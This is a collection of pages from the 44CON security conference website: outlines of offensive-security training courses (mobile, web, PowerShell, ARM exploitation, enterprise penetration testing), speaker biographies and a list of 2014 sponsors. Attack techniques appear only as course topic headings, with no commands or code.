          The course follows chapters 1-9 of the Mobile Application Hacker’s Handbook, with a strong focus on practical attacks. Over the 2-day training course delivered by the lead author of the book, delegates will learn the tricks and techniques to hack and secure mobile applications on the iOS and Android platforms.

          Course Length: 2 days (11th-12th September 2018), Novotel London West

          Presented By: Irena Damsky

          Security has long ago become more than just malware reverse engineering. To defend your organization, you need to analyze your adversary’s intent, opportunities and capabilities. The tools and skills needed are not only of deep technical nature, but also require one to leverage available intelligence and counterintelligence information and know how to make the most of it.

          To become a good intelligence analyst, you need to acquire a different way of thinking – an analytical mindset, which requires getting acquainted with field proven intelligence techniques and methodologies. These will serve as the basis for doing your daily analysis tasks in a much more productive and sophisticated way.

          In this course, which will include both lectures and hands on training, we will learn how to look beyond the malware itself in order to dig information on the infrastructure and actor behind it. We will understand the adversary’s intents, way of thinking and the risk it poses against our threat model, to develop the best protections and mitigations. We will get familiarized with tools for gaining insight into attacker’s workflow and learn how to integrate those into the organization.

          Course Length: 2 days (11th-12th September 2018), Novotel London West

          Presented by: Marcus Pinto and Aaron Devaney, MDSec

          The Web Application Hacker’s Handbook (WAHH) Series is the most deep and comprehensive general purpose guide to hacking web applications that is currently available. This course is a practical opportunity to take the skills and theory taught in the book to the next level, experimenting with all of the tools and techniques against numerous vulnerable web applications and labs, under the guidance of the book’s authors. The course also includes new material from the second edition of WAHH, bringing the course right up to date with the latest attacks.

          Course Length: 2 days (11th-12th September 2018), Novotel London West

          Presented by: Nikhil Mittal

          Penetration Tests and Red Team operations for secured environments need altered approaches. You cannot afford to touch disk, throw executables and use memory corruption exploits without the risk of being ineffective as a simulated adversary. To enhance offensive tactics and methodologies, PowerShell is the tool of choice.

          PowerShell has changed the way Windows networks are attacked. It is Microsoft’s shell and scripting language available by default in all modern Windows computers. It could interact with .Net, WMI, COM, Windows API, Registry and other computers on a Windows Domain. This makes it imperative for Penetration Testers and Red Teamers to learn PowerShell.

          This training is aimed towards attacking Windows network using PowerShell and is based on real world penetration tests and Red Team engagements for highly secured environments. The course runs as a penetration test of a secure environment with detailed discussion and use of custom PowerShell scripts in each phase.

           Course Length: 3 days (10th-12th September 2018), Novotel London West

          Presented by: Saumil Shah

          ARM has emerged as the leading architecture in the Internet of Things (IoT) world. The ARM IoT Exploit Laboratory is a 3-day intermediate level class intended for students who want to take their exploit writing skills to the ARM platform. The class covers everything from an introduction to ARM assembly all the way to Return Oriented Programming (ROP) on ARM architectures. Our lab environment features hardware and virtual platforms for exploring exploit writing on ARM based Linux systems and IoT devices.

          The class concludes with an end-to-end “Firmware-To-Shell” hack, where we extract the firmware from a popular SoHo router and an IP Camera, build a virtual environments to emulate and debug them, and then build exploits to gain a shell on the actual hardware devices.

           Course Length: 3 days (10th-12th September 2018), Novotel London West

          Book your 44CON 2018 training course now!

          #####EOF##### Hacking Enterprises: Exploiting Insecurity – 44CON

          Hacking Enterprises: Exploiting Insecurity

          Presented By: Will Hunt and Owen Shearing

          This is an immersive hands-on course that simulates a full-scale enterprise attack scenario. It allows students to assess the situation at every stage of a complex multi-layered penetration test and teaches them multiple ways to identify, enumerate, exploit and compromise an organisation.

          Students will have access to a cloud-based LAB containing multiple networks, some of which are hidden. The theory and exercise content reflect real-world encounters rather than text book challenges and students will complete a vast number of exercises including everything from OSINT and reconnaissance, to creating and executing phishing campaigns against our in-LAB live bots, all the way through to post-exploitation, lateral movement and C2 exfiltration.

          The 2 day course will take place on the 6th & 7th June 2019 in London.
          The price is £1,300 (inc VAT). Book your place in our shop now.

          Learning Objectives

          • Performing effective OSINT activities
          • Identifying live hosts and services over IPv4 and IPv6
          • IPv4/IPv6 enumeration and exploitation of targets from unauthenticated/authenticated
            perspectives
          • Cracking hashes from a variety of targets including Linux, Windows, DBs and password vaults
          • Performing effective post exploitation attacks, enumeration and data gathering
          • Creating and executing effective phishing campaigns
          • Performing lateral movement and routing traffic to hidden networks
          • Exploiting application weaknesses over tunnels, routed connections and shells
          • Understanding how Active Directory trusts operate, are structed and can be abused
          • Gaining persistence and exfiltrating data via out of band channels
          • Understanding how defensive monitoring can be used to identify malicious activities

          Course Outline

          Day 1:

          Introductions and LAB Overview

          • Overview of the LAB, subnets, challenges and targets
          • Introduction to infrastructure and application security assessments
          • Introduction to monitoring and alerting using our in-LAB ELK stack

          Leveraging OSINT Activities

          • Data scraping: Certificate transparency logs, forums, social media, Shodan/Zoomeye, Google
            dorks and publicly disclosed data breaches
          • Extracting document metadata

          Enumerating and Targeting IPv4 and IPv6 Hosts

          • IPv4/IPv6 construction and addressing schemes
          • ARP, ICMP, TCP, UDP
          • Identifying local and remote IPv4/IPv6 hosts using tools and manual techniques
          • Port scanning, service enumeration and fingerprinting using nmap and atk6 toolsets
          • Using common tools including dirb, wpscan and Metasploit to target IPv6 hosts
          • Parsing and interpreting scan output

          Exposure to Vulnerability Assessment Toolsets

          • Manual and automated approaches to vulnerability identification
          • Options for infrastructure/web
          • Differences in unauthenticated/authenticated scanning
          • Limitations of vulnerability tools vs manual methods

          Linux Enumeration

          • Enumerating and targeting application servers
          • Identifying and enumerating services including SSH, IMAP, SMTP, HTTP/S
          • Using Metasploit, nmap scripts and public code

          Linux Shells, Post Exploitation and Privilege Escalation (Covered in Days 1 and 2)

          • Exploiting weak file/folder permissions, ownership, SUID, SGID and sudo configurations
          • Hacking non-interactive shells and utilising binary breakouts/GTFOBins
          • Permission misconfigurations
          • Leveraging binary vulnerabilities to escalate privileges
          • Using Metasploit, hydra, ncrack and LinEnum

          P@ssw0rd Cracking (Linux)

          • Shadow file construction, hashing and salting (bcrypt, SHAx, MD5)
          • Online/offline attack differences, limitations and tool options
          • Keyspace, attack types and pros/cons of each
          • Utilising hashcat

          Windows Enumeration

          • Targeting SMB/LDAP for user enumeration
          • Explaining differences in data enumerated from unauthenticated/authenticated perspectives
          • User enumeration using recent Sensepost research (2018), built-in toolsets and nmap scripting

          Phishing

          • Phishing campaign infrastructure (domains, SMTP, landing pages)
          • Campaign creation and execution against in-LAB live bots
          • Payload options and attacker motives
          • Gaining access to OWA mailboxes and target hosts on different networks

          Day 2:

          Windows Shells, Post Exploitation and Privilege Escalation

          • Authenticated local/network enumeration
          • Local privilege escalation techniques
          • Kerberoasting
          • AMSI considerations and recent bypasses
          • Leveraging PowerView, Metasploit, Unicorn, SharpSploit and GhostPack
          • Extracting LAPS passwords
          • Domain Pass-the-Hash (PtH) and local PtH limitations/workarounds
          • Extracting clear-text passwords, tokens and LSA secrets
          • RDP session hijacking (time dependant)
          • Data exfiltration using PowerShell
          • Leveraging Mimikatz

          P@ssw0rd Cracking (Windows)

          • Local and Active Directory storage
          • LM/NTLM/NTLMv1/v2/cached creds/Kerberos
          • Interactive/non-interactive challenge/response processes
          • Further hashcat usage including rules and mask attacks

          Defensive Monitoring

          • Introduction to Kibana
          • Investigating events e.g. Windows Defender shutdown, process spawning, task execution and
            associated metadata

          Overcoming Restrictions/Policies Within an Active Directory Environment

          • AppLocker policies/configurations, PowerShell enumeration
          • Leveraging publicly disclosed methods/code and tools (GreatSCT)

          Situational Awareness, Lateral Movement and Pivoting

          • Network segmentation, routing and ingress/egress controls
          • Locating, enumerating and targeting hosts on different networks
          • Metasploit routing and Meterpreter port forwarding
          • SOCKS proxies and proxychains
          • SSH tunnelling (Windows and Linux) for inter-network routing
          • Targeting hosts using common tools over tunnels
          • Mapping with Bloodhound

          Application and Database Enumeration and Exploitation

          • Web application enumeration and vulnerability identification over pivots/tunnels
          • Web browser developer tools and BurpSuite
          • Database structures and enumeration
          • SQL 101 and different types of SQL injection
          • Exploiting recent SQL injection vulnerabilities using manual techniques and sqlmap
          • Database password hash cracking

          Abusing domain trusts to compromise the enterprise

          • Understanding Windows domain trusts
          • Enumerating trusted domains using PowerView
          • Leveraging Metasploit and built-in Windows functionality to enumerate target domains
          • Further Mimikatz usage

          Gaining Persistence & Data Exfiltration Over OOB Channels

          • Persistence mechanisms including registry, services, scheduled tasks, ADS
          • Backdooring hosts to establish out-of-band persistent C2 channels out of an organisation

          Target Audience

          This training is suited to a variety of students, including:

          • Penetration Testers
          • Security Professionals
          • IT Support, Administrative and Network Personnel
          • Anyone looking to enter the world of technical security

          Student Requirements

          • Familiarity with Windows and Linux command line syntax
          • A basic understanding of networking concepts

          What to Bring

          • Students will need to bring a laptop to which they have administrative/root access, running
            either Windows, Linux or Mac operating systems
          • Students will need to have access to VNC, SSH and OpenVPN clients on their laptops

          Students will be provided with

          We realise that 2-days is not a lot of time and therefore students are also provided with the following benefits.

          • 14-day extended LAB access after the course finishes
          • Access to a new LAB subnet and CTF style board with challenges to further test your skills
          • 14-day Slack support channel access where our security consultants are available
          • A Raspberry Pi with Kali Linux pre-installed
          • A portable wireless keyboard/mouse
          • A hard copy of the RTFM

          About the Trainers

          Owen Shearing
          Owen (@rebootuser) is a co-founder of in.security Ltd., a specialist cyber security consultancy offering technical and training services based in the UK. He is a CREST CCT level security consultant with a strong background in networking and IT infrastructure and has over a decade of experience in technical security roles. Owen is experienced in delivering on and offsite consultations and security testing, as well as providing technical training to a variety of audiences at bespoke events and various conferences. He runs the blog https://rebootuser.com and keeps projects at https://github.com/rebootuser.

          Will Hunt
          Will Hunt (@Stealthsploit) is a cyber security consultant who has worked in IT security for over 10 years. He co-founded in.security Ltd., a specialist cyber security company delivering high-end consultancy and training services. He has delivered infrastructure and web hacking courses at Black Hat USA and EU, as well as training at other bespoke international events and conferences. Will also assists the UK government in various technical, educational and advisory capacities. Before Will was a security consultant he was an experienced digital forensics consultant and trainer. He runs the blog https://stealthsploit.com.

          Book your 44CON June 2019 training course now!

          #####EOF##### 44CON 2016 Speakers – 44CON

          44CON 2016 Speakers

          Robert SchifreenRobert Schifreen

          Robert Schifreen is the founder of SecuritySmart.co.uk, which provides measurable IT security awareness training. He first became known in the security industry in 1985 when he was the first person in the world to be arrested and tried by a jury in connection with computer hacking. His ultimate acquittal in 1987 on all charges, by the House of Lords (the most supreme court at the time), led to the introduction of the Computer Misuse Act 1990.

           

          Daniel ComptonDaniel Compton Speaker Photo

          Daniel Compton works as a principal security consultant at Info-Assure Ltd. He is a certified CREST/CHECK team leader in both Infrastructure and Applications. Daniel has a keen interest in testing networking devices and has released a number of popular pentesting scripts to assist and automate testing in this area. Daniel is the head of security research at Info-Assure and has discovered over 70 security advisories in applications and network security appliances to date.

          Saumil Shahsaumil_headshot_soft

          Saumil Shah is the founder and CEO of Net-Square, providing cutting edge information security services to clients worldwide. Saumil is an internationally recognized conference speaker and instructor for over 15 years. He is also the co-developer of the wildly successful “Exploit Laboratory” courses and authored two books titled “Web Hacking: Attacks and Defense” and “The Anti-Virus Book”.

          Saumil holds an M.S. in Computer Science from Purdue University, USA and a B.E. in Computer Engineering from Gujarat University. He spends his leisure time playing Pacman, flying kites, traveling around the world and taking pictures.

          Will Schroeder Will Schroeder Speaker Photo

          Will Schroeder  is a security researcher and red-teamer for Veris Group’s Adaptive Threat Division. He is a co-founder of the Veil-Framework, developed PowerView and PowerUp, is an active developer on the PowerSploit project, and is a co-founder and core developer of the PowerShell post-exploitation agent Empire. He has presented at a number of security conferences on topics spanning AV-evasion, post-exploitation, red teaming, offensive PowerShell, and more.

          Steve Armstrong Steve-green-small

          Steve began working in the security arena in 1994 whilst serving in the UK Royal Air Force. He specialised in the technical aspects of IT security from 1997 onward, and before retiring from active duty, he lead the RAF’s penetration and TEMPEST testing teams. He founded Logically Secure in 2006 to provide specialist security advice to government departments, defense contractors, the online video gaming industry, and both music and film labels worldwide.

          When not teaching for SANS, Steve provides penetration testing and incident response services for some of the biggest household names in the high street, online gaming and music media. To relax Steve enjoys playing Battlefield and FPS games to loud music.

          Graham Sutherland Graham Sutherland Speaker Photo

          Graham is a pentester, electronics tinkerer, ex-developer, security researcher, reverse engineer, crypto enthusiast, promulgator of useless facts, vehement drunkard, and bacon aficionado. Can often be found scurrying towards a bar. One of his shoes is probably sentient.

          Graham McKay

          Graham leverages his 15 years of information security leadership experience to advise on appropriate security postures and resilience capabilities in line with risk appetite, focusing on business value.

          GMcKay2With a blend of technical skills and business acumen, a deep knowledge of information law including privacy, data protection and information rights, Graham holds the certifications CIPP/E, CISM, CRISC, MBCI and PCIP in addition to being a qualified accountant. He has recently graduated from Northumbria University with an LLM in Information Rights Law and Practice where his dissertation on the application of data protection regulations in the cloud computing landscape including cross jurisdictional boundary challenges received a distinction.

          Philippe Arteau 20150611_175309 (1)

          Philippe is a security researcher working for GoSecure. He is the author of the Java static analysis tool Find Security Bugs. He is actively doing research to find new attack vectors and develop new tools. His experiences are both in the offensive and the defensive side, having the chance to do countless pentests and code reviews.

          He has also built many plugins for Burp and ZAP proxy tools (Reissue Request Scripter, Retire.JS, PDF Viewer, CSP Auditor, etc.). He has discovered many vulnerabilities in popular software including Google Chrome, Dropbox, Paypal, RunKeeper and Jira.

          Haroon Meer

          Haroon Meer PicHaroon Meer is the founder of Thinkst, the company behind Canary. Haroon has contributed to several books on information security and has published a number of papers on various topics related to the field. Over the past decade (and a half) he has delivered research, talks, and keynotes at conferences around the world.

          Rogan Dawes

          Rogan is a senior researcher at SensePost and has been hacking since 1998, which,coincidentally, is also the time he settled on a final wardrobe. He used the time he saved on choosing outfits to live up to his colleague’s frequent joke that he has an offline copy of the Internet in his head. Rogan spent many years Rogan Dawes Speaker Photobuilding web application assessment tools, and is credited as having built one of the first and most widely used intercepting proxies; WebScarab.

          In recent years, Rogan has turned his attentions towards hardware hacking; and these days many suspect him to be at least part cyborg. A good conversation starter is to ask him where he keeps his JTAG header.

          Dominic White D.White speaker pic

          Dominic works at SensePost and tweets as @singe.

           

          Jacob Torrey Jacob Torrey Speaker Photo

          Jacob Torrey is an Advising Research Engineer at Assured Information Security, Inc. where he leads the Computer Architectures group and acts as the site lead for the Colorado branch. Jacob has worked extensively with low-level x86 and MCU architectures, having written a BIOS, OS, hypervisor and SMM handler. His major interest is how to (mis)use an existing architecture to implement a capability currently beyond the limitations of the architecture. In addition to his research, Jacob volunteers his time organizing conferences in Denver (RMISC & BSidesDenver) and regular meet-ups across the front range.

          Corsaire PortraitsKevin O’Reilly

          Kevin O’Reilly is a Principal Consultant and Head of Threat at Context Information Security. He is responsible for leading threat research and malware analysis within Context’s Response department. He has been working in information security for over 12 years. Prior to joining Context, he was previously Research Developer at Corsaire, after beginning his career as Virus Researcher at Anti-Virus firm Sophos.

           

          Olivier Bilodeau

          Olivier Bilodeau is the head of Cybersecurity Research at GoSecure a consultancy firm specializing in cybersecurity services for the public and private sector.Olivier Bilodeau

          With more than 10 years of infosec experience, Olivier worked on Unix servers, managed enterprise networks, wrote open source network access control software and recently worked as a Malware Researcher at ESET. He likes to reverse engineer everything that crosses his path, participate in information security capture-the-flag competitions, hack open source code and brew beer. He has spoken at various conferences (Defcon, Botconf, VirusBulletin, Derbycon, … ), used to lecture on information security at ETS University in Montreal, drives the NorthSec Hacker Jeopardy and co-organizes the MontreHack capture-the-flag training initiative. His primary research interests include reverse-engineering tools, Linux and/or embedded malware and honeypots.

          You can  follow Olivier on twitter @obilodeau

          Marc-Etienne M.LéveilléMarc-Etienne M Leveille

          Marc-Étienne has been a malware researcher at ESET since 2012. He specializes in malware attacking unusual platforms, whether it’s fruity hardware or software from south pole birds. Lately, Marc-Étienne was mostly reverse engineering server-side malware to discover their inner working and operation strategy. His research led to the publication of the Operation Windigo white paper that won Virus Bulletin’s Péter Szőr Award for best research paper in 2014.

          Outside his day job, Marc-Étienne enjoys designing challenges for the NorthSec CTF competition. He is also a co-organiser of the MontréHack monthly event. He presented at multiple conferences including CSAW:Threads, CARO Workshop and
          Linuxcon Europe. When he’s not one of the organizers, he loves participating in CTF competitions like a partying gentleman. Outside the cyberspace, Marc-Étienne plays the clarinet and reads comics. He tweets sporadically at @marc_etienne_.

          Saumil Shah

          saumil_headshot_softSaumil Shah, is the founder and CEO of Net-Square, providing cutting edge information security services to clients worldwide. Saumil is an internationally recognized conference speaker and instructor for over 15 years. He is also the co-developer of the wildly successful “Exploit Laboratory” courses and authored two books titled “Web Hacking: Attacks and Defense” and “The Anti-Virus Book”.

          Saumil holds an M.S. in Computer Science from Purdue University, USA and a B.E. in Computer Engineering from Gujarat University. He spends his leisure time playing Pacman, flying kites, traveling around the world and taking pictures.

          Joe FitzPatrick

          Joe-FitzPatrick-HeadshotJoe FitzPatrick has spent a decade working on low-level silicon debug, security validation, and penetration testing of CPUS, SOCs, and microcontrollers. He develops and delivers hardware security training at https://SecuringHardware.com, including Applied Physical Attacks on x86 Systems. In between, he keeps busy with contributions to the NSA Playset and other misdirected hardware projects, which he presents at all sorts of fun conferences.

          You can follow Joe on Twitter too @securelyfitz

          Emil Tan

          Emil started his career in infosec as a researcher at Singapore’s Defence Science National Laboratories, focusing primarily in the area of intrusion detection and deception. He was later appointed security administrator at a Security Ops Centre in the Ministry of Defence, Singapore. Emil then pursued his BSc Computer Science and MSc Information Security at Royal Holloway, University of London.Emil Tan

          Emil is an active advocate in the infosec community. He founded Edgis, a special interest group, and is also a Chapter Member with The Honeynet Project. Apart from these commitments, he also actively gets himself involved in infosec groups and events such as BSides London, Null Singapore, etc.

          Emil’s infosec foundation is highly technical, however he was also involved in other interdisciplinary studies during his university years, e.g. Political Science, Communication Science, Geospatial Theory, Psychology, etc. Emil now enjoys viewing the infosec world through this multi-disciplinary lens.

          Rebekah Brown

          Rebekah is the threat intelligence lead for Rapid7 where her responsibilities include program architecture, management, R.Brownanalysis and operations. Rebekah has spent over a decade in the intelligence community; her previous roles include NSA network warfare analyst, Operations chief of a United State Marine Corps cyber unit, and a Cyber Command training and exercise lead. She has helped develop threat intelligence programs at the federal, state, and local level as well as in the private sector and is a co-author for the SANS Cyber Threat Intelligence course.

          Juan Perez-Etchegoyen

          Juan Perez-Etchegoyen leads the Product teams that keep Onapsis on the cutting-edge of the business-critical applicationJuan Perez-Etchegoyen Speaker Photo security market. He is responsible for the design, research and development of Onapsis’ innovative software solutions, and helps manage the development of new products as well as the SAP cyber-security research that has garnered critical acclaim for the Onapsis Research Labs. He is regularly invited to speak and host training at global industry conferences including Blackhat, HackInTheBox, Troopers, and SAP TechEd/DCODE. Prior to joining Onapsis, Juan led many Information Security consultancy projects for Companies in Latin America, EE.UU. and Europe. His strongest experience is in the field of Penetration Testing, Web Application Testing, Vulnerabilities Research, Information Security Auditing and Standards.

          Nahuel D. Sanchez

          Nahuel D. Sanchez is a  security researcher at Onapsis. Being a member of Onapsis Research Labs, his work focuses on performing extensive research of SAP products and components, identifying and reporting security vulnerabilities, attack Nahuel Sanchez Speaker Photovectors and advanced exploitation techniques that are applicable to different platforms. Nahuel is one of the most frequent reporters of vulnerabilities in SAP products and is a frequent author of the publication “SAP Security In-Depth”. He previously worked as a security consultant, evaluating the security of Web applications and participating in Penetration Testing projects. His areas of interest include Web security, reverse engineering, and the security of Business-Critical applications.

          Azhar DesaiAzhar Desai Speaker Photo

          Azhar writes and runs software with a security bent at Thinkst, an applied research company focusing on information security. He has, in the past, had fun presenting with others from Thinkst at conferences such as Troopers (2015) and HITB KL (2014).

          Nicholas Rohrbeck

          Nicholas Rohrbeck Speaker PhotoNick is a software developer at Thinkst Applied Research. Before arriving at Thinkst, he was primarily a Java developer, but now his days are filled with Python, network security research, DevOps tinkering and (badly) playing Go.

           

           

          Ian Trump

          Ian Trump, CD, CPM, BA is an ITIL certified Information Technology (IT) consultant with 20 years of experience in IT security and information technology. As a project and operational resource, Ian has functioned as an IT business analyst, project coordinator and as a senior technical security resource as required. Ian’s broad experience on security integration projects, facilitating technological change and promoting security best practices have been embraced and endorsed by his industry peers.Ian Trump 2

          From 1989 to 1992, Ian served with the Canadian Forces (CF), Military Intelligence Branch; in 2002, he joined the CF Military Police Reserves and retired as a Public Affairs Officer in 2013. His previous contract was managing all IT projects for the Canadian Museum of Human Rights (CMHR). CMHR is the first museum solely dedicated to the evolution, celebration and future of human rights – it is the first national museum to be built in nearly half a century, and the first outside the National Capital Region.

          Currently, Ian is the Global Security Lead at LogicNow working across all lines of business to define, create and execute security solutions to promote a safe, secure Internet for Small & Medium Business world wide.

          Evan Booth 

          Evan Booth loves to build stuff out of other stuff. As an engineer for Skookum, a full service software development company in Charlotte, North Carolina, he works to solve a variety of business problems through the creative use of technology. As a human for Earth, he tends to break things for curiosity’s sake.evan_booth

          Throughout 2013 and into 2014, in an effort to highlight hypocrisy and “security theater” brought about by the TSA, through a research project called “Terminal Cornucopia,” Evan created an arsenal ranging from simple, melee weapons to reloadable firearms to remotely-triggered incendiary suitcases—all solely comprised of items that anyone can purchase inside most airport terminals *after* the security checkpoint.

          Given the right ingredients, a big cardboard box can be a time machine, spaceship, minecart, or a telephone booth that only calls people named “Steve” who live in the future.

          Jerry Gamblin

          Jerry Gamblin’s passion for security was ignited in 1989 when he hacked Oregon Trail to give himself the highest score in history in the world on his 3rd grade teacher’s Apple IIe.Jerry Gamblin pic

          As a (mostly) grown up security evangelist and analyst, he has been featured on numerous blogs, podcasts and has spoken at security conferences around the world on keeping companies secure.

          When he’s not helping companies be more secure, you can find him taking his son to swim lessons or learning how to solder.

          You can read his latest thoughts at jerrygamblin.com.

          Guanxing Wen

          Guanxing Wen is a member of Pangu Team. His focus includes performing root-cause analysis, g-wengfuzzing and exploit development. Prior to joining Pangu, Wen worked as a security researcher of Venustech ADlab. He is actively involved in Bug Bounty Program, such as ZDI, Chrome VRP and is currently the top one bug contributor of IBB-Flash Bounty (@hhj4ck).

          #####EOF##### 44CON 2014 Sponsors – 44CON

          44CON 2014 Sponsors

          Platinum Sponsor
          nccgroup

          NCC Group

          http://www.nccgroup.com

          NCC Group is a leading global information assurance company, providing freedom from doubt that all critical material is available, protected, and operating as it should be at all times. Information assurance is delivered through escrow and verification, security testing, audit and compliance, software testing and web performance services.

          Gold Sponsors
          mwr-logo

          MWR InfoSecurity

          http://www.mwrinfosecurity.com

          MWR InfoSecurity is proud to be supporting 44CON 2013! Having been involved in 44CON from the beginning, MWR is keen to continue its long standing relationship with the UK’s premier security conference. As a company we invest heavily in knowledge sharing and we are proud to be a part of an event that provides a platform for discussion on the latest thinking and research in the InfoSec arena.

          akamai

          Akamai

          http://www.akamai.com

          Akamai® is a leading provider of cloud services for delivering, optimising and securing online content and business applications. At the core of the Company’s solutions is the Akamai Intelligent Platform™ providing extensive reach, coupled with first class reliability, security, visibility and expertise. Akamai enables enterprises to securely leverage the cloud, avoid data theft and downtime and protect from increasing frequency, scale and sophistication of Web attacks.

          thales

          Thales

          https://www.thalesgroup.com/

          Thales is a global technology leader in the Aerospace, Transportation and Defence & Security markets. In 2013, the company generated revenues of €14.2 billion with 65,000 employees in 56 countries. With its 25,000 engineers and researchers, Thales has a unique capability to design, develop and deploy equipment, systems and services that meet the most complex security requirements. Thales has an exceptional international footprint, with operations around the world working with customers and local partners. Thales UK employs 7,500 staff based at 35 locations. In 2013 Thales UK’s revenues were around £1.3 billion.

          Silver Sponsors
          contextis

          Context Information Security

          http://www.contextis.com

          Context is an independently operated cyber security consultancy, founded in 1998 and focusing on providing highly skilled consultants to help organisations with their information security challenges. We work with some of the world’s most high profile blue chip companies and government organisations.

          ironkey

          IronKey

          http://www.ironkey.com

          Imation’s IronKey mobile security solutions protect sensitive data. Advanced authentication and encryption meet compliance requirements, deploy secure workspaces that go anywhere employees do and allow you to maintain control of confidential data. IronKey solutions meet the challenge of protecting today’s mobile workforce, featuring secure USB solutions for data transport and mobile workspaces.

          msft_logo

          Microsoft

          http://www.microsoft.com/security

          Microsoft is proud to be a sponsor of the 44CON Security Conference. 44CON provides a forum in which security researchers from all over the world, IT pros, and industry luminaries can share insights, knowledge and information to advance security research. We’re happy to be here and glad to be part of the community.

          Other Event Sponsors
          digital-shadows-1

          Digital Shadows

          http://www.digitalshadows.com

          Digital Shadows is a cyber intelligence company that protects organisations from data loss and targeted cyber attack. By applying our award-winning blend of expertise and technology we enable organisations to exploit social, cloud and mobile technologies while keeping their security and reputations intact. Our managed services monitor millions of data sources across the visible and dark web to deliver focussed, relevant intelligence about the risks you need to mitigate.

          alien8

          alien8 Security

          http://alien8security.com

          Exclusive providers of Immunity’s Canvas and Silica in Europe and Digital Shadows Partner. Immunity’s CANVAS is ground breaking software that allows you to test compliance and let your organization discover how vulnerable you really are and SILICA helps you understand the vulnerabilities of your WiFi network.

          Digital Shadows is a cyber intelligence company that protects organisations from data loss and targeted cyber attack. Contact security@alien8security.com for quotes and to find out more.

          mandalorian

          Mandalorian

          http://www.mandalorian.com

          Mandalorian are an independent UK-based provider of information security services with specialisms in penetration testing and malware analysis. We focus on being the easiest supplier you’ve ever worked with and being fanatical about the quality of our work.

          logicallysecure
          nostarch

          No Starch Press

          http://nostarch.com

          No Starch Press has long had a reputation for publishing unique books on technology, with a focus on open source, security, hacking, programming, alternative operating systems, LEGO®, science, and math.

          tigerscheme

          Tiger Scheme

          http://tigerscheme.org

          Tiger Scheme is an independent certification scheme that gives those commissioning security testing services confidence that they were hiring an individual or company that has been assessed to the highest standards. Tiger Scheme provides career progression through intermediate and senior level certification and technical specialist roles.

          blackberry

          BlackBerry

          http://www.blackberry.com/security

          BlackBerry Security works to make BlackBerry® one of the most secure mobile platforms available. BlackBerry Security builds collaborative relationships across the industry, monitors the security threat landscape and responds rapidly to emerging incidents to provide customers with the guidance and tools they need to protect their systems and devices.

          halon

          Halon Security

          http://www.halon.se/

          Halon Security is a prominent developer of bi-directional e-mail control and security. The company was founded in 2002 and is known for its award-winning e-mail security solutions, which are used by large hosting providers, non-commercial and government organizations, municipalities and companies of all sizes. Protecting millions of users world-wide, Halon is known for its quality and excellence.

          crest-new

          CREST

          http://www.crest-approved.org

          CREST is a not-for-profit organisation that represents the technical information security industry, primarily penetration testing, cyber security incident response and security architecture services.

          CREST offers public and private sector organisations an assurance that the technical security advisors they appoint are competent, qualified and professional with current knowledge. It also ensures that the CREST member companies they engage with have the appropriate processes and controls in place to perform the services for which they have been appointed and protect sensitive client-based information.

          qualys

          Qualys

          http://www.qualys.com/

          Qualys, Inc. (NASDAQ: QLYS) is a pioneer and leading provider of cloud security and compliance solutions with over 6,700 customers in more than 100 countries, including a majority of each of the Forbes Global 100 and Fortune 100. The QualysGuard Cloud Platform and integrated suite of solutions help organizations simplify security operations and lower the cost of compliance by delivering critical security intelligence on demand and automating the full spectrum of auditing, compliance and protection for IT systems and web applications. Founded in 1999, Qualys has established strategic partnerships with leading managed service providers and consulting organizations including Accuvant, BT, Dell SecureWorks, Dimension Data, E-Cop, Fujitsu, HCL, NTT, Symantec, Verizon and Wipro. The company is also a founding member of the Cloud Security Alliance (CSA) and a Premium Corporate Member of OWASP.

          coseinc

          COSEINC

          http://www.coseinc.com

          COSEINC is a Singapore based and privately funded company dedicated to providing highly specialized information security services to our clients. Founded in 2004, we are a young and dynamic company whose constitution are computer security experts, from diverse backgrounds and geographies, with distinguished credentials and experience.

          It is our aim to provide our clients with the most professional and competent expertise and services at the most reasonable rates so that they can achieve the highest returns on their information technology investment.

          pentest-partners

          PenTest Partners

          http://www.pentestpartners.com

          Pen Test Partners LLP is a CHECK & CREST accredited pen testing company that is approved by the PCI Council to undertake card breach work as a PCI PFI. We investigate roughly half of all credit card data breaches in the UK which provides us with excellent real-time threat intelligence, used to augment our testing. We are a limited liability partnership for a very good reason; being in a partnership means that our people are heavily invested the company. It’s that employee ownership which inspires and drives the quality in what we do.

          nettitude

          Nettitude

          http://www.nettitude.co.uk/penetration-testing/

          Nettitude is a cyber security and risk management consultancy that provides businesses and public sector organisations with governance, risk management and compliance services. Counting many of the FTSE 350 among its customers, Nettitude specialises in helping companies and organisations that can least afford to fall victim to a security breach due to the value of the data they hold, or the strict compliance regulations governing their industries.

          pqchat

          PQChat

          https://pq-chat.com

          PQChat is the world’s first commercially available post-quantum instant messenger based on the Robert McEliece cryptosystem. Every message you send has a different encrypted output.

          Our mission is to empower our users so you can take back control of your data and digital life. All the data belongs to you, privately and securely. Our business model is not based on data mining you, your data or your on/offline behaviour.

          Media Partners
          itsecguru

          IT Security Guru

          http://itsecurityguru.org

          IT Security Guru is a website containing industry news, blogs, videos, jobs and links to the best stories on the internet. Every day we look at the big stories, talk to the key people and bring the main topics to the end-user audience. Since we relaunched our website in January 2014 we have been delighted to support community events such as 44CON and we look forward to being involved in the build up to the show and attending the conference in September.

          restricted-intel

          Restricted Intelligence

          http://www.restrictedintelligence.co.uk

          Restricted Intelligence has been making entertaining films for business for more than a quarter of a century, long before the term ‘content marketing’ had even been invented. More recently we were approached by two global organisations (in the same month) asking us to communicate the fundamentally dry subject of ‘information security’ to their many thousands of globally dispersed employees. We like a challenge. That’s when this all started.

          Event Partners
          antipode

          Antipøde

          http://www.blackandwhitecoffee.co.uk

          Having spent many years in Brisbane, Australia, behind the machines in a few of its most renowned coffee hangouts; Harvey’s (under chef PJ McMillan), Au Cirque and The Little Larder, it became quickly apparent after moving to London, that the city was crying out for the simple things in life, like a good flat white.
          Our Raison d’être is simple – to provide the London public with the quality and standards associated with Australian coffee culture.

          ESW T-Shirt design.indd

          ESW Solutions

          http://www.eswav.com

          Founded in 1995, ESW Solutions has quickly become a major force in the Audio Visual industry – building on its first class reputation for customer service, quality and commitment. From a large multi room European conference to a small meeting we have the experience to make your event successful. We also produce live events for a wide range of clients, Awards Ceremonies, Talent Competitions, Festival Stages etc.

          ESW is also the home to Talking Slides a unique product that gets content presented at your conference online and ready to view in a simple, cost-effective and hassle-free manner. We attend your event and capture the presentations as they happen. However, the recording of your event is just the beginning.

          We take the high-definition presentation recordings and host them within our Talking Slides management system, complete with search facilities, registration options and even pay-per-view access.

          #####EOF##### Partager un lien sur Twitter

          Partager un lien avec vos abonnés

          Nouveau sur Twitter ?

